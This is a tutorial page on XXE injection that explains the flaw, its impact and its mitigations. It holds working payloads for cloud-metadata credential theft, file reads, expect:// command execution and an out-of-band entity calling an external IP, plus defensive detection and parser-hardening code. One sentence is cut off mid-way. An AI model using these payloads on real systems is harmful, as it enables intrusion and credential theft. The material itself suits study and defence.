# External XML Entity (XXE)

## External XML Entity (XXE) <a href="#external-xml-entity-xxe" id="external-xml-entity-xxe"></a>

<figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FICjS85DrM1PwSfDooV42%2Fimage.png?alt=media&#x26;token=1b5a32da-7216-44be-8f5c-5007bf9334de" alt=""><figcaption></figcaption></figure>

| Content                 |
| ----------------------- |
| 📚 What Is XXE?         |
| 🤔 Why Does XXE Happen? |
| 🧬 XXE Types            |
| ⚔ Impact                |
| 🔎 How To Find          |
| ⚙ Mitigation            |
| 🛠 Tools                |
| 📕 Reference            |
| 🔬 Labs                 |

## 📚 What Is XXE? <a href="#what-is-xxe" id="what-is-xxe"></a>

### What is XML? <a href="#what-is-xml" id="what-is-xml"></a>

XML stands for "Extensible Markup Language". It is the most common language for storing and transporting data, and it is self-describing: it has no predefined tags like `<p>` or `<img>`; all tags are user-defined according to the data they represent, for example `<email></email>` or `<message></message>`.

You can read more about XML entities [**here**](https://portswigger.net/web-security/xxe/xml-entities) rather than repeating it on this page.

### Definition of XXE <a href="#definition-of-xxe" id="definition-of-xxe"></a>

An XML External Entity (XXE) attack targets an application that parses XML input and allows XML entities to be defined in that input. XML entities can be used to tell the XML parser to fetch specific content on the server.

![](https://i.imgur.com/p5VvvI9.png)

### What is the Document Type Definition (DTD)? <a href="#what-is-the-document-type-definition-dtd" id="what-is-the-document-type-definition-dtd"></a>

A DTD describes the structure of the document and contains element and attribute declarations. An element declaration lists the elements allowed in the document; an attribute declaration lists the attributes allowed on each element.

Syntax:

```xml
<!DOCTYPE element DTD identifier
[
 declaration1
 declaration2
 ........
]>
```

![](https://i.imgur.com/LWfPsLH.png)

![](https://i.imgur.com/7NXrCyk.png)

### 🤔 Why Does XXE Happen? <a href="#why-xxe-happen" id="why-xxe-happen"></a>

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

***

### 🧬 XXE Types <a href="#xxe-types" id="xxe-types"></a>

1. Basic XXE
2. Blind XXE

#### Blind XXE <a href="#blind-xxe" id="blind-xxe"></a>

Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.

There are two broad ways to find and exploit blind XXE vulnerabilities:

* Trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data.
* Trigger XML parsing errors in such a way that the error messages contain sensitive data.

***

### ⚔ Impact <a href="#impact" id="impact"></a>

XML External Entity (XXE) injection can pose a severe threat to a company or a web developer. XXE has consistently appeared in the OWASP Top 10. Many websites use XML for the storage and transport of data, and if countermeasures are not taken that information can be compromised. The attacks that become possible include:

* Server-Side Request Forgery (**SSRF**)

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

* Remote Code Execution (**RCE**)

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

![](https://i.imgur.com/pKGL3Zz.png)

* Read Files

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

* Cross-Site Scripting (**XSS**)

```xml
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```

Content-Type: from JSON to XML. Some endpoints that normally receive JSON will also accept XML if the `Content-Type` header is changed; to convert a JSON request body to XML you can use the Burp extension [**Content Type Converter**](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html).

Here is an example of such a conversion:

```json
Content-Type: application/json;charset=UTF-8

{"root": {"root": {
  "firstName": "Avinash",
  "lastName": "",
  "country": "United States",
  "city": "ddd",
  "postalCode": "ddd"
}}}
```

```xml
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]> 
<root>
 <root>
  <firstName>&xxe;</firstName>
  <lastName/>
  <country>United States</country>
  <city>ddd</city>
  <postalCode>ddd</postalCode>
 </root>
</root>
```

#### File Upload <a href="#file-upload" id="file-upload"></a>

XXE can also be performed via file upload. We will demonstrate this using the PortSwigger lab "Exploiting XXE via Image Upload". The payload we will use is:

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/hostname"> ] >
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-size="40" x="0" y="100">
        &xxe;
    </text>
</svg>
```

Understanding the payload: we make an SVG file because the upload area accepts only image files. The basic syntax of an SVG file is shown above, and inside it we have added a text element that will

We save the above code as "payload.svg". Then, in the PortSwigger lab, we open a post, go to the comment form and upload the payload in the avatar field.

***

### 🔎 How To Find <a href="#how-to-find" id="how-to-find"></a>

Look for any endpoint that parses XML data, or that accepts JSON but can be switched to XML by changing the `Content-Type` (as shown above), and try injecting an **XXE** payload there.
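The following detection logic is an added example and not part of the original page: it scans logged request records for the markers the payloads above share (a DTD, a SYSTEM/PUBLIC entity plus the reference that expands it, the XInclude namespace) and for the JSON-to-XML content-type switch described earlier, so the same rule covers the "How To Find" endpoints from the defender's side. The record keys, the sample bodies and the `oob.example.test` host are constructed for this example.

```python
import re

# Markers the page's payloads share: an external (SYSTEM/PUBLIC) entity and XInclude.
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.-]+)\s+(?:SYSTEM\s+|PUBLIC\s+[\"'][^\"']*[\"']\s+)"
    r"[\"']([^\"']*)[\"']", re.IGNORECASE)
XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

def classify_uri(uri: str) -> str:
    """Map an entity URI to the impact class the page lists for it."""
    u = uri.lower()
    if u.startswith("file:"):
        return "local-file-read"
    if u.startswith("expect:"):
        return "command-execution"
    if "169.254.169.254" in u:
        return "cloud-metadata-ssrf"
    if u.startswith(("http:", "https:", "ftp:")):
        return "out-of-band-or-ssrf"
    return "other"

def analyze(record: dict) -> list:
    """Findings for one request record: content_type, body, optional expected_type."""
    findings = []
    ctype = record["content_type"].split(";")[0].strip().lower()
    if record.get("expected_type") == "application/json" and "xml" in ctype:
        findings.append("content-type-switched-json-to-xml")  # converter trick
    if "xml" not in ctype:  # also matches text/xml, image/svg+xml, ...+xml
        return findings
    body = record["body"]
    if "<!DOCTYPE" in body.upper():
        findings.append("dtd-declared")
    for is_pe, name, uri in EXT_ENTITY_RE.findall(body):
        kind = "parameter-entity" if is_pe else "general-entity"
        findings.append(f"{kind}:{name}:{classify_uri(uri)}")
        if not is_pe and re.search(rf"&{re.escape(name)};", body):
            findings.append(f"entity-referenced:{name}")
    if XINCLUDE_NS in body:
        findings.append("xinclude-used")
    return findings

# Constructed records; the payload bodies are the page's own (OOB host is a placeholder).
BENIGN = {"content_type": "application/xml",
          "body": "<stockCheck><productId>381</productId></stockCheck>"}
FILE_READ = {"content_type": "application/xml", "body":
             '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
             '<stockCheck><productId>&xxe;</productId></stockCheck>'}
JSON_TO_XML = {"expected_type": "application/json", "content_type": "application/xml;charset=UTF-8",
               "body": '<!DOCTYPE t [<!ENTITY xxe SYSTEM "http://oob.example.test/x">]>'
                       '<root><firstName>&xxe;</firstName></root>'}
```

Screening raw bodies this way is a detection aid only; it can be evaded by encoding tricks, so the parser configuration in the Mitigation section remains the actual control.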

***

### ⚙ Mitigation <a href="#mitigation" id="mitigation"></a>

The best way to avoid XXE vulnerabilities is to:

* Disable document type definitions (DTDs) in your XML parser altogether.
* If that is impossible, disable external entities and external document type declarations in your parser.
* Disable support for `XInclude`.
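As an added example (not code from the original page), here is how the first two mitigations look with Python's standard `xml.sax` parser: a lexical handler that refuses any DOCTYPE, and the `feature_external_ges` / `feature_external_pes` switches that stop SYSTEM/PUBLIC entities from being fetched. The `stockCheck` sample documents are constructed (the second is the page's own file-read payload), and `parse_hardened`, `_RejectDtd` and `_LeafText` are this example's own names.

```python
import io
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes, property_lexical_handler)

class DtdRejected(ValueError):
    """Raised the moment the parser reports a <!DOCTYPE ...> declaration."""

class _RejectDtd:
    """Lexical handler for mitigation 1: refuse any DTD. expat reports startDTD
    before the internal subset is read, so no <!ENTITY> is ever processed."""
    def startDTD(self, name, public_id, system_id):
        raise DtdRejected(f"DOCTYPE {name!r} not allowed")
    endDTD = startCDATA = endCDATA = comment = lambda self, *args: None

class _LeafText(ContentHandler):
    """Collects the text of leaf elements, e.g. {'productId': '381'}."""
    def __init__(self):
        super().__init__()
        self.fields, self._stack = {}, []
    def startElement(self, name, attrs):
        if self._stack:
            self._stack[-1][2] = True          # parent now has a child element
        self._stack.append([name, [], False])  # name, text parts, has_children
    def characters(self, data):
        self._stack[-1][1].append(data)
    def endElement(self, name):
        name, parts, has_children = self._stack.pop()
        if not has_children:
            self.fields[name] = "".join(parts).strip()

def parse_hardened(raw: bytes, allow_dtd: bool = False) -> dict:
    """allow_dtd=False: any DOCTYPE raises DtdRejected (mitigation 1).
    allow_dtd=True: DTDs are tolerated but SYSTEM/PUBLIC entities are never
    fetched (mitigation 2), so &xxe; expands to nothing instead of a file."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # no external general entities
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    if not allow_dtd:
        parser.setProperty(property_lexical_handler, _RejectDtd())
    handler = _LeafText()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(raw))
    return handler.fields

# Constructed samples: a benign stock check and the page's file-read payload.
BENIGN = b'<?xml version="1.0"?><stockCheck><productId>381</productId></stockCheck>'
XXE_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?>'
               b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
               b'<stockCheck><productId>&xxe;</productId></stockCheck>')
```

The same two switches exist under other names in most parsers (for example `disallow-doctype-decl` and the `external-general-entities` / `external-parameter-entities` features on a Java `DocumentBuilderFactory`); the principle is identical.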

***

### 🛠 Tools <a href="#tools" id="tools"></a>

[**xxeftp:**](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads

[**xxexploiter:**](https://github.com/luisfontes19/xxexploiter) - Tool to help exploit XXE vulnerabilities

[**230-OOB:**](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via <http://xxe.sh/>

[**XXEinjector:**](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerabilities using direct and various out-of-band methods

[**oxml\_xxe:**](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)

[**docem:**](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in DOCX, ODT, PPTX, etc.

[**otori:**](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.

***

### 📕 Reference <a href="#referance" id="referance"></a>

[**OWASP**](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_\(XXE\)_Processing)

[**PayloadsAllTheThings**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md#tools)

[**hacktricks**](https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity)

[**hackingarticles**](https://www.hackingarticles.in/comprehensive-guide-on-xxe-injection/)

[**acunetix**](https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/)

[**Portswigger**](https://portswigger.net/web-security/xxe)

[**Portswigger-Xml-Entities**](https://portswigger.net/web-security/xxe/xml-entities)

[**Portswigger-Blind**](https://portswigger.net/web-security/xxe/blind)

[**XXE\_Attack\_Guide**](http://synradar.com/documents/XXE_Attack_Guide.pdf)

***

### 🔬 Labs <a href="#labs" id="labs"></a>

1. [**PortSwigger**](https://portswigger.net/web-security/cross-site-scripting)\
   PortSwigger lab solutions are [**here**](https://0xkourama.gitbook.io/blog/port-swigger-labs/xml-external-entity-xxe-injection).
2. [**OWASP Broken Web Applications Project**](https://sourceforge.net/projects/owaspbwa/)**:**\
   Install this machine and you will have many labs such as **DVWA**, **bWAPP**, **WebGoat**, etc.
